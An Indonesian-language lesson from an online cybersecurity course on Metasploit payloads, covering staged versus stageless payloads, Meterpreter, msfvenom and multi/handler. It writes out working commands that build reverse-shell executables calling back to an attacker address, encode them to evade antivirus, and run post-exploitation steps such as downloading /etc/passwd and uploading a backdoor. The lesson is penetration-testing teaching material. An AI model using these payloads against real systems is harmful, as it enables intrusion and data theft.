Muatan: Bertahap vs Tanpa Tahap, Meterpreter
Pilih muatan yang tepat untuk suatu skenario dan gunakan Meterpreter untuk pascaeksploitasi.
Muatan: Bertahap vs Tanpa Tahap, Meterpreter adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 3 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa itu Muatan?
Muatan adalah kode yang berjalan pada target setelah eksploitasi berhasil. Muatan menentukan apa yang diperoleh penyerang: shell, eksekusi perintah, akses berkas, atau agen berfitur lengkap seperti Meterpreter.
Muatan Bertahap dan Tanpa Tahap
Muatan tanpa tahap (/) berisi semuanya dalam satu biner — lebih besar tetapi lebih sederhana, dan tidak memerlukan panggilan balik jaringan setelah pengiriman awal. Muatan bertahap (//) mengirim penginisialisasi kecil terlebih dahulu, yang mengunduh tahap kedua dari penangan.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsKapan Menggunakan Masing-Masingnya
Gunakan muatan tanpa tahap ketika target tidak memiliki akses internet/ke penangan setelah eksploitasi awal — muatan harus mandiri. Gunakan muatan bertahap ketika Anda menginginkan muatan awal yang lebih kecil dan memiliki koneksi penangan yang andal.
Gambaran Umum Meterpreter
Meterpreter adalah muatan lanjutan Metasploit — berjalan sepenuhnya di memori, menggunakan komunikasi terenkripsi, dan menyediakan API yang kaya fitur: akses sistem berkas, migrasi proses, pencatatan tombol, pengambilan tangkapan layar, dan pivoting.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runPerintah Meterpreter
Perintah Meterpreter penting untuk pascaeksploitasi: informasi sistem, daftar proses, operasi berkas, dan jaringan.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigrasi Proses
Migrasikan proses Meterpreter ke proses yang lebih stabil atau kurang mencurigakan (misalnya, explorer.exe di Windows). Tindakan ini juga dapat meningkatkan hak akses jika proses dimigrasikan ke proses dengan hak istimewa yang lebih tinggi.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsMembuat Muatan dengan msfvenom
msfvenom membuat berkas muatan mandiri (EXE, ELF, APK, shellcode) untuk dikirim melalui phishing, penempatan USB, atau shell web dalam pengujian yang diotorisasi.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler untuk Menangkap Shell
Modul tambahan multi/handler menangkap koneksi shell balik. Konfigurasikan modul ini dengan muatan, LHOST, dan LPORT yang sama seperti yang Anda gunakan di msfvenom sebelum mengirimkan muatan.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobDasar-Dasar Pengodean dan Pengelakan
Pengode msfvenom dapat mengaburkan muatan untuk menghindari deteksi AV dasar berbasis tanda tangan. Catatan: EDR modern menggunakan deteksi perilaku — pengode saja tidak cukup untuk menghadapi pertahanan tingkat lanjut.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeMuatan Bind dan Muatan Balik
Muatan balik terhubung dari target ke penyerang (lebih baik untuk NAT/firewall). Muatan bind mendengarkan pada target — penyerang terhubung ke dalam. Muatan balik lebih disukai dalam sebagian besar skenario.
Deteksi Muatan oleh Pembela
Pembela mendeteksi Meterpreter melalui: tanda tangan jaringan (pola lalu lintas C2), pemindaian memori (artefak injeksi DLL reflektif), dan analisis perilaku (pengosongan proses, hubungan induk-anak yang tidak biasa).
Pemeriksaan Singkat
Apa yang membedakan muatan bertahap dari muatan tanpa tahap di Metasploit?
Ringkasan: Muatan dan Meterpreter
Pilih muatan bertahap untuk jejak awal yang kecil, dan muatan tanpa tahap untuk pengiriman mandiri. Meterpreter adalah muatan paling mumpuni untuk pascaeksploitasi: berjalan di memori, terenkripsi, dan dapat diperluas. Gunakan msfvenom untuk membuat biner mandiri dan selalu konfigurasikan multi/handler untuk menangkap panggilan balik.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Muatan: Bertahap vs Tanpa Tahap, Meterpreter” gratis?
Ya — teks lengkap “Muatan: Bertahap vs Tanpa Tahap, Meterpreter” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Muatan: Bertahap vs Tanpa Tahap, Meterpreter”?
Pilih muatan yang tepat untuk suatu skenario dan gunakan Meterpreter untuk pascaeksploitasi. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 3 dari 4.
Berapa lama pelajaran “Muatan: Bertahap vs Tanpa Tahap, Meterpreter” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Arsitektur Metasploit dan msfconsole
- Mengeksploitasi Kerentanan yang Diketahui
- Muatan: Bertahap vs Tanpa Tahap, Meterpreter
- Pascaeksploitasi: Pivot dan Persistensi